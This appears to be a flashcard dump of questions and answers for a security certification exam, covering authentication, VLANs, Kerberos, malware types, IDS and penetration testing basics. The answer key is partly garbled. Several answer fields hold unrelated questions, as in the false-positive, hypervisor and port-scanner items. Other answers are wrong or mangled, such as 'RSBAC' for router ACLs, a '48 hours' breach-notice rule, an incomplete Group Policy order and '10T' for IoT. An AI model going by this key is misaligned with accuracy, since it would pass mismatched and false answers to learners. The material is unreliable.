A security administrator needs to run a vulnerability scan that will analyze a system from the perspective of a hacker attacking the organization from the outside.What type of scan should he use?
Non-credentialed scan
Which of the following can make password useless on a router.
Not controlling physical access to the router
Which of the following identifies standards and XML formats for reporting and analyzing system vulnerabilities?
OVAL
What is another term for the type of login credentials provided by a token device?
One time password
You install a new Linux distribution on a server in your network. The distribution includes an SMTP daemon that is enabled by default when the system boots. The SMTP daemon does not require authentication to send email messages.Which type of email attack is this server susceptible to?
Open SMTP relay
What type of password is maryhadalittlelamb?
Pass phrase
A security administrator is conducting a penetration test on a network. She connects a notebook system to a mirror port on a network switch. She then uses a packet sniffer to monitor network traffic to try to determine which operating system are running on networks hosts.Which process did the administrator use in the penetration test in this scenario?
Passive fingerprinting
Which of the following is the most common form of authentication?
Password
Which of the following is most vulnerable to a brute force attack?
Password authentication
What common design feature among Instant Messaging clients make them more insecure than other means of communicating over the Internet?
Peer-to-peer networking
Which of the following uses hacking techniques to proactively discover internal vulnerabilities?
Penetration testing
You suspect that your Web server has been the target of a denial of service attack. You would like to view information about the number of connections to the server over the past three days.Which log would you most likely examine?
Performance
Properly configured passive IDS and system audit logs are an integral part of a comprehensive security plan. Which step must be taken to ensure that the information is useful in maintaining a secure environment?
Periodic reviews must be conducted to detect malicious activity or policy violations.
Users in your organization receive email messages informing them that suspicious activity has been detected on their bank accounts. They are directed to click a link in the email to verify their online banking user name and password. The URL in the link is in the .ru top-level DNS domain.What kind of attack has occurred?
Phishing
As you browse the Internet, you notice that when you go to some sites, multiple additional windows are opened automatically. Many of these windows contain advertisements for products that are inappropriate for you r family to view.Which tool can you implement to prevent these windows from showing?
Pop-up blocker
You manage a network that uses a single switch. All ports within your building connect through the single switch.In the lobby of your building are three RJ-45 ports connected to the switch. You want to make sure that visitors cannot plug in their computer to the free network jacks and connect to the network. However, employees who plug into those same jacks should be able to connect to the network.What feature should you configure?
Port authentication
You want to make sure that set of servers will only accept traffic for specific network services. You have verified that the servers are only running the necessary services, but you also want to make sure that the servers will not accept packets sent to those services.Which tool should you use?
Port scanner
Instant messaging does not provide which of the following?
Privacy
A relatively new employee in the data entry cubical farm was assigned a user account similar to the other data entry employees' accounts. However, audit logs have shown that this user account has been used to change ACLs on several confidential files and has accessed data in restricted areas. This situation indicates which of the following has occurred?
Privilege escalation
An attacker has obtained the logon credentials for a regular user on your network. Which type of security threat exists if this user account is used to perform administrative functions?
Privilege escalation
You decide to use a packet sniffer to identify the type of traffic sent to a router. You run the packet sniffing software on a device, which is connected to the same hub that is connected to the router.When you run the software, you only see frames addressed to the workstation, not to other devices. Which feature should you configure.
Promiscuous mode
What does hashing of log files provide?
Proof that the files have not been altered.
Which of the following is an advantage of a virtual browser?
Protects the host operating system from malicious downloads.
You have recently reconfigured FTP to require encryption of both passwords and data transfers. You would like to check network traffic to verify that all FTP passwords and data are encrypted.
Protocol analyzer
You want to identify traffic that is generated and sent through the network by a specific application running on a device.Which tool should you use?
Protocol analyzer
Match each description on the left with the appropriate cloud technology on the right. Public cloud Private cloud Community cloud Hybrid cloud
Provides cloud services to just about anyone.Provides cloud services to a single organization.Allows cloud services to be shared by several organizations.Integrates one cloud service with other cloud services.
Which of the following data destruction techniques uses a punch press or hammer system to crush a hard drive?
Pulverizing
You have implemented an access control method that only allows users who are managersto access specific data. Which type of access control model is used?
RBAC
A router access control list uses information in a packet such as the destination IP address and port number to make allow or deny forwarding decisions. This is an example of which kind of access control model?
RSBAC
Which of the following password attacks uses a preconfigured matrices of hashed dictionary words?
Rainbow table
Which phase or step of a security assessment is a passive activity?
Reconnaissance
Children's Online Privacy Protection Act (COPPA)
Requires organizations that provide online services designed for children below the age of 13 to to obtain personal content prior to collecting a childs personal information.
You want to use a tool to scan a system for vulnerabilities, including open ports, running services, and missing patches. Which tools should you use? (Select two.)
Retina Nessus
Which access control model manages rights and permissions based on job descriptions and responsibilities?
Roll-based access control (RBAC)
Which of the following is undetectable software that allows administrator-level access?
Rootkit
You have heard about a new malware program that prevents itself to users as a virus scanner. When users run this software it installs itself as a hidden program that has admin level access to various operating system components. The program then tracks system activity and allows an attacker to remotely gain admin access to this computer.Which of the following terms best describes this software
Rootkit
Which of the following is an example of Rule Based Access Control (RBAC)
Router access control lists that allows or denies traffic based on the characteristics of an IP packet
You have a development machine that contains sensitive information relative to your business. You are concerned that spyware and malware might be installed while users browse websites, which could compromise your system or pose a confidentiality risk.Which of the following actions would best protect your system?
Run the browser within a virtual environment.
You have run a vulnerability scanning tool and identified several patches that need to be applied to a system. What should you do next after applying the patches?
Run the vulnerability assessment again
Which of the following activities are typically associated with penetration testing? (select two)
Running a port scannerAttempting social engineering
You want to use a protocol for encrypting emails that uses a PKI with X.509 certificates. Which method should you choose?
S/MIME
Which of the following mechanisms can you use to add encryption to email? (Select two.)
S/MIME PGP
You want to use Kerberos to protect LDAP authentication. What authentication mode should you use?
SASL
Which of the following is a disadvantage of software-defined networking (SDN)?
SDN standards are still being developed
You have a website that accepts input from users for creating customer accounts. Input on the form is passed to a database server where the user account information is stored.an attacker is able to insert database commands in the input fields and have those commands execute on the server.Which type of attack has occurred?
SQL injection
Which of the following network services or protocols uses TCP/IP PORT 22?
SSH
FTPS uses which mechanism to provide security for authentication and data transfer?
SSL
You have installed anti-virus software on the computers on your network. You update the definition and engine files and configure the software to update those files every day.What else should you do to protect your systems from malware? (Select two.)
Schedule regular full system scans. Educate users about malware.
What is the primary distinguishing characteristic between a worm and a logic bomb?
Self-replication.
Lori Redford, who has been a member of the Project Management group, was recently promoted to manager of the team. She has been added a s a member of the Managers group.Several days after being promoted, Lori needs to have performance reviews with the team she manages but she cannot access the performance management system. As a member of the Managers group, she should have the Allow permission to access this system.What is most likely preventing her from accessing this system?
She is still a member of the Project Management group, which has been denied permission to this system. Deny permissions always override Allow permissions.
Your organization's security policy specifies that any mobile device that connects to your internal network must have Remote Wipe enabled, regardless of ownership. If the device is lost or stolen, then it must be wiped to remove any sensitive data from it.Your organization recently purchased several Windows RT tablets. Which should you do?
Sign up for a Windows Intune account to manage the tablets.
Which IDS method searches for intrusion or attack attempt by recognizing patterns or identities listed in a database?
Signature based
What type of attack is most likely to succeed against communications between Instant Messaging clients?
Sniffing
Network engineers have the option of using software to configure and intelligently control the network rather than relying on the individual static configuration files that are located on each network device.Which of the following is a relatively new technology that allows network and security professionals to use software to manage, control, and make changes to a network?
Software-defined networking
Match the authentication factor types on the left with the appropriate authentication factor on the right. Each authentication factor type can be used more than once. PIN Smart card Password Retina scan Fingerprint scan Hardware token Pass phrase Voice recognition Wi-Fi triangulation Typing behaviors
Something You Know Something You Have Something You Know Something You Are Something You Are Something You Have Something You Know Something You Are Somewhere You Are Something You Do
An attacker sends an unwanted and unsolicited email message to multiple recipients with an attachment that contains malware.What kind of attack has occurred in this scenario?
Spam
Which of the following could easily result in a denial of service attack if the victimized system had too little free storage capacity?
Spam
If an SMTP server is not properly and secretly configured, it can be hijacked and used maliciously as a SMTP relay agent. Which activity could result if this happens?
Spamming
Which type of malicious activity can be described as numerous unwanted and unsolicited email messages sent to a wide range of victims?
Spamming
You manage a network that uses multiple switches. You want to provide multiple paths between switches so that if one link goes down, an alternate path is available. What feature should your switch support?
Spanning Tree
Which of the following solutions would you implement to eliminate switching loops?
Spanning tree
You manage a single subnet with three switches. The switches are connected to provide redundant paths between the switches.Which feature prevents switching loops and ensures there is only a single active path between any two switches?
Spanning tree
California Database Security Breach Act
Specifies that any agency, person, government entity, or company that does business with California must inform California residents within 48 hours if database breach or other security breach occurs in which personal information has been stolen or is believed to have been stolen.
Match each bring your own device (BYOD) security concern on the right with a possible remedy on the left. Each remedy may be used once, more than once, or not at all. Users take pictures of proprietary processes and procedures. Devices with a data plan can email stolen data. Devices have no PIN or password configured. Anti-malware software is not installed. A device containing sensitive data may be lost.
Specify where and when mobile devices can be possessed in your acceptable use policy. Specify where and when mobile devices can be possessed in your acceptable use policy. Enroll devices in a mobile device management system. Implement a networking access control (NAC) solution. Enroll devices in a mobile device management system.
Which type of virus conceals its presence by intercepting system request and altering service outputs?
Stealth.
A virtual LAN can be created using which of the following?
Switch
When configuring VLANs on a switch, what is used to identify which VLAN a device belongs to?
Switch port
Which of the following is a standard for sending log messages to a central logging server?
Syslog
Over the past few days, a server has gone offline and rebooted automatically several times. You would like to see a record of when each of these restarts has occurred.
System
Which of the following protocols can be used to centralize remote access authentication?
TACACS
Encryption is what type of access control?
Technical
What is the primary purpose of penetration testing?
Test the effectiveness of your security perimeter
You have recently experienced a security incident with one of your servers. After some research, you determine that the hotfix #568994 that has recently been released would have protected the server.Which of the following recommendations should you follow when applying the hotfix?
Test the hotfix and then apply it to all servers.
Arrange the Group Policy objects (GPOs) in the order in which they are applied. 1 2 3
The Local Group Policy on the computer. GPOs linked to the domain that contains the user or computer object. GPO linked to the organizational unit that contains the object
If a user's BYOD device, such as a tablet or phone, is infected with malware, that malware can be spread if that user connects to our organization's network. One way to prevent this event is to use a network access control (NAC) system.How does an NAC protect your network from being infected by a BYOD device?
The NAC remediates devices before allowing then to connect to your network.
Software-defined networking (SDN) uses a controller to manage the devices. The controller is able to inventory hardware components in the network, gather network statistics, make routing decisions based on gathered data, and facilitate communication between devices from different vendors. It can also be used to make wide-spread configuration changes on just one device.Which of the following best describes an SDN controller?
The SDN controller is software
Which of the following is a snap-in that allows you to apply a template or compare a template to the existing security settings on your computer?
The Security Configuration and Analysis snap-in
You have opted to use software-defined networking (SDN) to manage, control, and make changes to your network. You want to be able to use software to configure and intelligently control the network, rather than relying on the individual static configuration files that are located on each network device.SDN consists of three layers; -Application layer -Control layer -Physical layer Which of the following describes what the SDN control layer does to networking devices that comprise the physical layer?
The control layer removes the control plane from networking devices and creates a single control plane.
Which of the following advantages can single sign-on (SSO) provide? (Select two.)
The elemination of multiple user accounts and passwords for each individual.Access to all authorized resources with a single instance of authentication.
Which of the following defines the crossover error rate for evaluating biometric systems?
The point where the number of false positives matches the number of false negatives in a biometric system.
Which of the following describes the worst possible action by an IDS?
The system identified harmful traffic as harmless and allowed it to pass without generating any alerts.
Drag each penetration test characteristic on the left to the appropriate penetration test name on the right. White box test Grey box test Black box test Single blind test Double blind test
The tester has detailed information about the target system prior to starting the test. The tester has the same amount of information that would be available to a typical insider in the organization. The tester has no prior knowledge of the target system. Either the attacker has prior knowledge about the target system, or the administrator knows that the test is being performed. The tester does not have prior information about the system and the administrator has no knowledge that the test is being performed
Which of the following best describes an audit daemon?
The trusted utility that runs a background process whenever auditing is enabled.
Which of the following is not true regarding cookies?
They operate within a security sandbox
When using Kerberos authentication, which of the following terms is used to describe the token that verifies the identity of the user to the target system?
Ticket
Which of the following are required when implementing Kerveros for authentication and authorization? (Select two.)
Ticket granting server Time synchronization
A user has just authenticated using kerberos. What object is issued to the user immediately following login?
Ticket granting ticket
Which of the following are requirements to deploy Kerberos on a network
Time synchronization between devices A centralized database of users and passwords.
A honeypot is used for which purpose?
To delay intruders in order to gather auditing data.
Which of the following is not a form of biometric?
Token device
If your anti-virus software does not detect and remove a virus, what should you try first?
Update your virus detection software.
Which is a program that appears to be a legitimate application, utility, game, or screensaver and performs malicious activities surreptitiously?
Trojan Horse
When configuring VLANs on a switch, what type of switch ports are members of all VLANs defined on the switch?
Trunk ports
Which of the following is stronger than any biometric authentication factor?
Two-factor authentication
ecently, a Web site named www.vidshare.com has become extrememtly popular with users around the world. An attacker registers the following domain names: -www.videoshare.com -www.vidshar.com -www.visshare.com Each of these URLs points to a phishing Web site that tricks users into supplying their vidshare.com user names and passwords.What type of attack has occurred in this scenario?
Typosquatting
You want to use a vulnerability scanner to check a system for known security risks. What should you do first?
Update the scanner definition files
You have just installed a new network-based IDS system that uses signature recognition. What should you do on a regular basis?
Update the signature files
Match the IT audit activity on the left with the appropriate description on the right. Documents incidents for security violations and incident response Identifies inefficient IT strategies, such as weak policies and procedures. Verifies the appropriate use of accounts and privileges. Checks user/group rights and privileges to identify cases of creeping privileges. Determines whether privilege-granting processes are appropriate and whether computer use and escalation processes are in place and working.
Usage auditing Risk evaluation Escalation auditing Privilege auditing User access and rights review
You've just deployed a new Cisco router that connects several network segments in your organization.The router is physically located in a locked server closet. You use an FTP client to regularly back up the router configuration to a remote server in a an encrypted file. You access the router configuration interface from a notebook computer that is connected to the router's console port. You've configured the device with the user name admin01 and the password P@ssW0rd. You have used the MD5 hashing algorithm to protect the password.What should you do to increase the security of this device?
Use SCP to back up the router configuration to a remote location.
Your LDAP directory services solution uses simple authentication. What should you always do when using a simple authentication?
Use SSL
You've just deployed a new Cisco router that connects several network segments in your organization.The router is physically located in a server room that requires an ID card to gain access. You've backed up the router configuration to a remote location in an encrypted file. You access the router configuration interface from your notebook computer by connecting it to the console port on the router. You configured the management interface with a user name of admin and a password of password. What should you do to increase the security of this device?
Use a stronger administrative password
A user named Bob Smith has been assigned a new desktop workstations to complete his day-to-day work.When provisioning Bob's user account in your organization's domain, you assigned an account name of BSmith with an initial password of bw2Fs3d.On first login, Bob is prompted to change his password, so he changes it to the name of his dog (Fido).What should you do to increase the security of Bob's account? (Select two.)
Use group policy to require strong passwords on user accounts. Train users not to use passwords that are easy to guess.
You are concerned that an attacker can gain access to your Web server, make modifications to the system, and alter the log files to hide his actions. Which of the following actions would best protect the log files?
Use syslog to send log entries to another server.
Which security mechanism uses a unique list that meets the following specifications: -The list is embedded directly in the object itself -The list defines which subjects have access to certain objects -The list specifies the level or type of access allowed to certain objects
User ACL
User Education and Awareness Policy
User Education and Awareness Training
Which of the following information is typically not included in an access token?
User account password
Your organization has started receiving phishing emails. You suspect that an attacker is attempting to find an employee workstation they can compromise. You know that a workstation can be used as a pivot point to gain access to more sensitive systems. Which of the following is the most important aspect of maintaining network security against this type of attack?
User education and training
You are creating a new Active Directory domain user account for the Rachel McGaffey user account. During the account setup process, you assigned a password to the new account. However, you know that the system administrator should not know any user's password for security reasons. Only the user should know his or her own password-no one else. Click the option you would use in the New Object - User dialog to remedy this situation.
User must change password at next login
Which of the following describes Privilege auditing?
Users' and groups' rights and privileges are checked to guard against creeping privileges.
You've just deployed a new Cisco router that connects several network segments in your organization.The router is physically located in a locked server closet. You use an FTP client to regularly back up the router configuration to a remote server in a an encrypted file. You access the router configuration interface from a notebook computer that is connected to the router's console port. You've configured the device with the user name admin01 and the password P@ssW0rd. You have used the MD5 hashing algorithm to protect the password.What should you do to increase the security of this device? Use SCP to back up the router configuration to a remote location. You can use a variety of methods to manage the configuration of a network router. Match the management option on the right with its corresponding description on the left. (Each option can be used more than once.)SSLHTTPSSHTelnetConsole Port
Uses public-key cryptography Transfers data in cleartext Uses public-key cryptography Transfers data in cleartext Cannot be sniffed
You run a small network for your business that has a single router connected to the internet and a single switch. You keep sensitive doc. on a computer that would like to keep isolated from other computers on the network. Other hosts on the network should not be able to communicate with this computer through the switch, but you still need to access the network through the computer. What should you implement?
VLAN
Your company is a small start-up company that has leased office in a building shared by other businesses. All businesses share a common network infrastructure. A single switch connects all devices in the building to the router that provides Internet access. You would like to make sure that your computers are isolated from computers used by other companies. Which feature should you request to have implemented?
VLAN
You manage a network that uses a single switch. All ports within your building connect through the single switch.In the lobby of your building are three RJ-45 ports connected to the switch. You want to allow visitors to plug into these ports to gain Internet Access, but they should not have access to any other devices on your private network. Employees connected throughout the rest of your building should have both private and Internet access.Which feature should you implement?
VLANs
Which of the devices facilitates communication between different virtual machines by check data packer before moving them to a destination.
Virtual Switch
You want to be able to identify the services running on a set of servers on your network. Which tool would best give you the information you need?
Vulnerability scanner
What is the main difference between vulnerability scanning and penetration testing?
Vulnerability scanning is performed within the security perimeter; penetration testing is performed outside of the security perimeter.
Which of the following tools can you use on a Windows network to automatically distribute and install software and operating system patches on workstations? (Select two.)
WSUS Group Policy
Which of the following describes a false positive when using an IPS device?
Which of the following devices is capable of detecting and responding to security threats?Legitimate traffic being flagged as malicious.
Which of the following devices is computer software, firmware, or hardware that creates and runs virtual machines?
Which of the following devices is computer software, firmware, or hardware that creates and runs virtual machines?
Which of the following functions can a port scanner provide? (Select two.)
Which of the following is the type of port scan that does not complete the full three-way TCP handshake, but rather listens only for either SYN/ACK packets?
You want to use a tool to see packets on a network, including the source and destination of each packet.Which tool should you use?
Wireshark
Which of the following is an example of a decentralized privilege management solution?
Workgroup
Which of the following is an attack that injects malicious scripts into Web pages to redirect users to fake websites or gather personal information?
XSS
Your organization is formulating a bring your own device (BYOD) security policy for mobile devices.Which of the following statements should be considered as you formulate your policy?
You can't use domain-based group policies to enforce security settings on mobile devices.
In which of the following situations would you use port security?
You wanted to restrict the devices that could connect through a switch port
Which of the following types of penetration test teams will provide you information that is most revealing of a real-world hacker attack?
Zero knowledge team
What is the main difference between a worm and a virus?
a worm can replicate itself, while a virus requires a host for distribution
As a security professional, you need to understand your network on multiple levels. You should focus on the following areas: • Entry points • Inherent vulnerabilities • Documentation • Network baseline Drag the area of focus on the left to the appropriate example on the right. (Areas of focus may be used once, more than once, or not at all.)
[10T and SCADA devices.]Inherent vulnerabilities[Used to identify a weak network architecture or design.]Documentation[Public-facing servers, workstations, Wi-Fi networks, and personal devices.]Entry points [An older version of Windows that is used for a particular application.]Inherent vulnerabilities[What activity looks like in normal day-to-day usage.]Network baseline
Drag the description on the left to the appropriate switch attack type shown on the right.
[ARP Spoofing/ Poisoning]The source device sends frames to the attacker's MAC address instead of the correct device. [Dynamic Trunking Protocol] Should be disabled on the switch's end user (access) ports before implementing the switch configuration into the network. [MAC Flooding] Causes packets to fill up the forwarding table and consumes so much of the switch's memory that enters a state called fail open mode. [MAC Spoofing] Can be used to hide the identity of the attacker's computer or impersonate another device on the network.
Drag the network attack technique on the left to the appropriate description or example on the right. (each technique may be used once, more than once, or not at all.)
[Perpetrators attempt to compromise or affect the operations of a system.]Active attack[Unauthorized individuals try to breach a network from off-site.]External attack[Attempting to find the root password on a web server by brute force.]Active attack[Attempting to gather information without affecting the flow of information on the network.]Passive attack[Sniffing network packets or performing a port scan.]Passive attack
You want to protect the authentication credentials you use to connect to the LAB server in your network by copying them to a USB drive.
back up credentials
Network-based intrusion detection is most suited to detect and prevent which types of attacks?
bandwidth-based denial of service
A collection of zombie computers have been setup to collect personal information. What type of malware do the zombie computer represent?
botnet